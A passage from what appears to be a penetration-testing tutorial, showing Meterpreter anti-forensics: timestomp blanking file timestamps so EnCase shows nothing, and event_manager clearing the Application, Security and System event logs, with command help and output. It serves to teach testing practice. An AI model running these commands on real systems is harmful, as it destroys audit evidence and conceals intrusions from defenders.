background image

Simulated Penetration Test



    -a <opt>  Set the "last accessed" time of the file
    -b        Set the MACE timestamps so that EnCase shows blanks
    -c <opt>  Set the "creation" time of the file
    -e <opt>  Set the "mft entry modified" time of the file
    -f <opt>  Set the MACE of attributes equal to the supplied file
    -h        Help banner
    -m <opt>  Set the "last written" time of the file
    -r        Set the MACE timestamps recursively on a directory
    -v        Display the UTC MACE values of the file
    -z <opt>  Set all four attributes (MACE) of the file

meterpreter > 

timestomp C:\\boot.ini -b

[*] Blanking file MACE attributes on C:\boot.ini
meterpreter >  

In this example, we changed the timestamp so that when Encase (a popular 

forensics analysis tool) is used, the timestamps are blank.

The tool 


 will modify event logs so that they don’t show any 

information that might reveal that an attack occurred. Here it is in action:

meterpreter > 

run event_manager

Meterpreter Script for Windows Event Log Query and Clear.


    -c <opt>  Clear a given Event Log (or ALL if no argument specified)
    -f <opt>  Event ID to filter events on
    -h        Help menu
    -i        Show information about Event Logs on the System and their configuration
    -l <opt>  List a given Event Log.
    -p        Supress printing filtered logs to screen
    -s <opt>  Save logs to local CSV file, optionally specify alternate folder in which to 

save logs

meterpreter > 

run event_manager -c

[-] You must specify an eventlog to query!
[*] Application:
[*] Clearing Application
[*] Event Log Application Cleared!
[*] MailCarrier 2.0:
[*] Clearing MailCarrier 2.0
[*] Event Log MailCarrier 2.0 Cleared!
[*] Security:
[*] Clearing Security
[*] Event Log Security Cleared!
[*] System:
[*] Clearing System
[*] Event Log System Cleared!
meterpreter >